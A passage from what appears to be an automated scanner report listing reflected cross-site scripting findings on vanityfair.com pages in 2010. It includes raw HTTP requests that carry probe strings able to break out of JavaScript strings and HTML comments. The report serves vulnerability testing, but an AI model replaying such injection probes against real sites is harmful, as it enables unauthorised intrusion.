This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010/11c6935-->d45cae87ca0/2010-gift-guide-original-keys.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:59 GMT
Date: Mon, 29 Nov 2010 16:48:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47610


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
use bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[2128751646]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11c6935-->d45cae87ca0/2010-gift-guide-original-keys.html?proxyuri=online%2Fdaily%2F2010%2F11c6935--%3Ed45cae87ca0%2F2010-gift-guide-original-keys.html':
escaped absolute path not valid.
->
...[SNIP]...

1.169. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-original-keys.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/2010-gift-guide-original-keys.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7f0b'%3bbb6e98289f8 was submitted in the REST URL parameter 4. This input was echoed as d7f0b';bb6e98289f8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010/11d7f0b'%3bbb6e98289f8/2010-gift-guide-original-keys.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:58 GMT
Date: Mon, 29 Nov 2010 16:48:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44644


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010/11d7f0b';bb6e98289f8/2010-gift-guide-original-keys.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue g
...[SNIP]...

1.170. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-original-keys.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/2010-gift-guide-original-keys.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90d33'%3bc6e7d19006a was submitted in the REST URL parameter 5. This input was echoed as 90d33';c6e7d19006a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010/11/2010-gift-guide-original-keys.html90d33'%3bc6e7d19006a HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:10 GMT
Date: Mon, 29 Nov 2010 16:49:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44644


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-original-keys.html90d33';c6e7d19006a',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.171. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-original-keys.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/2010-gift-guide-original-keys.html

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload f731d-->9374b3139f2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010/11/2010-gift-guide-original-keys.htmlf731d-->9374b3139f2 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:12 GMT
Date: Mon, 29 Nov 2010 16:49:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47610


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
xceptions.ApplicationBug:
-:[1375901215]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11/2010-gift-guide-original-keys.htmlf731d-->9374b3139f2?proxyuri=online%2Fdaily%2F2010%2F11%2F2010-gift-guide-original-keys.htmlf731d--%3E9374b3139f2':
escaped absolute path not valid.
->
...[SNIP]...

1.172. http://www.vanityfair.com/online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload d8474-->34c932e97fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010d8474-->34c932e97fc/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:34 GMT
Date: Mon, 29 Nov 2010 16:48:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
[Cause bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[1713091351]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010d8474-->34c932e97fc/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html?proxyuri=online%2Fdaily%2F2010d8474--%3E34c932e97fc%2F11%2Fleslie-nielsen-of-naked-gun-movies-dead-at-84.html':
escaped absolute path not valid.

...[SNIP]...

1.173. http://www.vanityfair.com/online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82871'%3b13c6cb3812c was submitted in the REST URL parameter 3. This input was echoed as 82871';13c6cb3812c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/201082871'%3b13c6cb3812c/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:32 GMT
Date: Mon, 29 Nov 2010 16:48:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44658


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/201082871';13c6cb3812c/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the
...[SNIP]...

1.174. http://www.vanityfair.com/online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 65dbb-->03384675ace was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010/1165dbb-->03384675ace/leslie-nielsen-of-naked-gun-movies-dead-at-84.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:56 GMT
Date: Mon, 29 Nov 2010 16:48:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47780


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
ause bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[695907475]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/1165dbb-->03384675ace/leslie-nielsen-of-naked-gun-movies-dead-at-84.html?proxyuri=online%2Fdaily%2F2010%2F1165dbb--%3E03384675ace%2Fleslie-nielsen-of-naked-gun-movies-dead-at-84.html':
escaped absolute path not valid.
->
...[SNIP]...

1.175. http://www.vanityfair.com/online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74c61'%3bf4c9c5b674a was submitted in the REST URL parameter 4. This input was echoed as 74c61';f4c9c5b674a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010/1174c61'%3bf4c9c5b674a/leslie-nielsen-of-naked-gun-movies-dead-at-84.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:51 GMT
Date: Mon, 29 Nov 2010 16:48:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44660


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010/1174c61';f4c9c5b674a/leslie-nielsen-of-naked-gun-movies-dead-at-84.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the po
...[SNIP]...

1.176. http://www.vanityfair.com/online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 9a6fc-->5e7991969f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html9a6fc-->5e7991969f HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:10 GMT
Date: Mon, 29 Nov 2010 16:49:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47773


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
ationBug:
-:[1887021592]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html9a6fc-->5e7991969f?proxyuri=online%2Fdaily%2F2010%2F11%2Fleslie-nielsen-of-naked-gun-movies-dead-at-84.html9a6fc--%3E5e7991969f':
escaped absolute path not valid.
->
...[SNIP]...

1.177. http://www.vanityfair.com/online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad547'%3b7239765144 was submitted in the REST URL parameter 5. This input was echoed as ad547';7239765144 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.htmlad547'%3b7239765144 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:08 GMT
Date: Mon, 29 Nov 2010 16:49:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44659


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.htmlad547';7239765144',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.178. http://www.vanityfair.com/online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4729e'%3b519e2f92600 was submitted in the REST URL parameter 3. This input was echoed as 4729e';519e2f92600 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

